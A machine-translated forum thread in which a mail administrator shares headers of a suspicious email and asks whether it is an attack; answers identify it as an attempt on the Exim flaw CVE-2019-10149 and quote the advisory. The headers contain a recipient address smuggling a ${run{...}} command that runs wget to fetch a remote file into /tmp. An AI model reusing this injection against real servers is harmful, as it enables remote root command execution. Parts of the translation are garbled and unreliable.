今天,我在所有收件箱中发现了一封极其不寻常的电子邮件,其中没有主题,发件人或内容。我的Android专用Gmail客户端报告该邮件是由me发送的,在我的脑海中触发了核警报。

我担心有人猜到了我可靠的密码,并且该邮件来自我的邮件传输代理( MTA),因此我急忙查看电子邮件本身和邮件日志。那没有发生。

我发现对我来说就像是尝试利用fail2ban和我从未听说过的邮件服务器漏洞。

Received: 20
Received: 19
Received: 22
Received: 21
Received: 18
Received: 15
Received: 14
Received: 17
Received: 16
Received: 29
Received: 28
Received: 31
Received: 30
Received: 27
Received: 24
Received: 23
Received: 26
Received: 25
Received: 13
Received: 3
Received: 4
Received: 5
Received: 2
Received: from example.org (localhost [127.0.0.1])
    by example.org (Postfix) with ESMTP id 1FA141219E6
    for <root+${run{x2Fbinx2Fsht-ctx22wgetx20YYY.YYY.YYY.YYYx2ftmpx2fYYY.YYY.YYY.YYYx22}}@example.org>; Wed, 19 Jun 2019 04:42:52 +0200 (CEST)
Received: from service.com (unknown [xx.xx.xx.xx])
    by example.org (Postfix) with SMTP
    for <root+${run{x2Fbinx2Fsht-ctx22wgetx20YYY.YYY.YYY.YYYx2ftmpx2fYYY.YYY.YYY.YYYx22}}@example.org>; Wed, 19 Jun 2019 04:42:50 +0200 (CEST)
Received: 1
Received: 10
Received: 11
Received: 12
Received: 9
Received: 6
Received: 7
Received: 8
Message-ID: <000701d526651b5e30521a90$@Domain>
MIME-Version: 1.0
Content-Type: text/plain;
    charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Outlook 16.0
X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx20xxx.xxx.xxx.xxxx2ftmpx2fxx.xxx.xxx.xxx22}}@example.org
Authentication-Results: example.org; 
X-DKIM-Authentication-Results: none
Thread-Index: AQHpZJXbpRRTStcSuHvAzmVQv5xuOw==


分析:发件人试图更改邮件目的地,以便启动以下(编码的)命令并利用潜在的远程执行代码漏洞,其中X的序列表示IP地址

X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx20xxx.xxx.xxx.xxxx2ftmpx2fxx.xxx.xxx.xxxx22}}@example.org


x2Fbinx2Fsht-ctx22wgetx20[IP ADDR]x2ftmpx2f[IP ADDR]x22
/bin/sht-ct#wget [IP ADDR]/tmp/[IP ADDR]#


尽管sht-ct是我不熟悉的东西(或从手动url解码错误翻译),但我还是从所有攻击者都知道我将Postfix用作服务器上的MTA的假设开始。 br />
问题:

我想确认这是否是对通过精心设计的电子邮件进行远程命令执行攻击的真实尝试。其次,我敦促通过仔细检查pwnedtop以外的其他方式来评估我是否曾经是crontab。我需要了解这种攻击是否会影响我的MTA或试图利用过时且已修复的漏洞。

我只是急于更新Postfix,但不知道该漏洞(以及是否曾经影响Postfix ),我几乎没有任何线索。与其他类型的服务相比,时间较短,需要迅速采取行动。

评论

这似乎是通过收件人电子邮件地址的SMTP注入。 mbsd.jp/Whitepaper/smtpi.pdf

我在我管理的其中一台Postfix服务器上看到了相同的攻击模式,该服务器始于昨天下午3:13 CT。电子邮件中的“已接收”符号使我认为下载可能已成功,但/ tmp中没有任何明显的迹象。

“我想知道这个[我在一个公开可见的SEO优化网站上发布的一部分代码,作为高可见性热点网络问题的一部分]是最近的已知漏洞还是0天漏洞。”如果答案是肯定的,那么您认为在其他人的安全下,将其张贴在这里真的是最佳的做法吗? (在这里进行元讨论。)

@WBT,是的,看到其他人知道一些信息让我感觉好多了,任何人扫描本网站以利用这些信息必须被本网站追随者的真正目的或安全性所迷惑。受到质疑。该站点可作为解决紧急问题的来源,或者不像希望的那样成为“热网络”前线的捐助者。
@ camp0,如果我可以对评论进行投票,则对您的评论进行投票。为什么“看源代码”是这么多人的第一反应。我知道自己为运行MTA所做的一切并不意味着我可以解密和解释所使用软件包的源代码,不仅能够驱动使我成为合格的机械师。

#1 楼

这是试图利用EXIM邮件服务器(CVE-2019-10149)中当前的远程执行代码问题。有关详细信息以及您遇到的攻击类型,请参见向导的回报:Exim中的RCE。如果您不使用EXIM或运行固定版本,则将是安全的。

从链接的文章(添加了重点):


此漏洞可以立即被利用。本地攻击者(在某些非默认配置中为
远程攻击者)。若要在默认配置中远程利用此漏洞,攻击者必须保持与易受攻击的服务器的连接保持打开状态7天(通过
每隔几分钟发送一次字节)。但是,由于Exim代码的极端复杂性,我们不能保证此
开发方法是唯一的;可能存在较快的方法。

[...]

因为expand_string()可以识别“ $ {run {}}”
扩展项,并且因为new ->地址是要发送的邮件的收件人
,本地攻击者可以简单地将邮件发送到
“ $ {run {...}} @ localhost”(其中“ localhost”是Exim的其中一个
local_domains)并以root用户身份执行任意命令
(默认情况下,deliver_drop_privilege为false):


root@debian:~# cat /tmp/id
uid=0(root) gid=111(Debian-exim) groups=111(Debian-exim)
uid=0(root) gid=111(Debian-exim) groups=111(Debian-exim)


评论


您可能希望直接链接CVE,这很清楚,而不是博客文章,它对它的解释很差。

–霍布斯
19年6月24日在15:12

@hobbs:您链接的不是CVE本身,而是Qualys的建议。

– Steffen Ullrich
19年6月24日在15:35

抱歉。那。 :)

–霍布斯
19年6月24日在15:45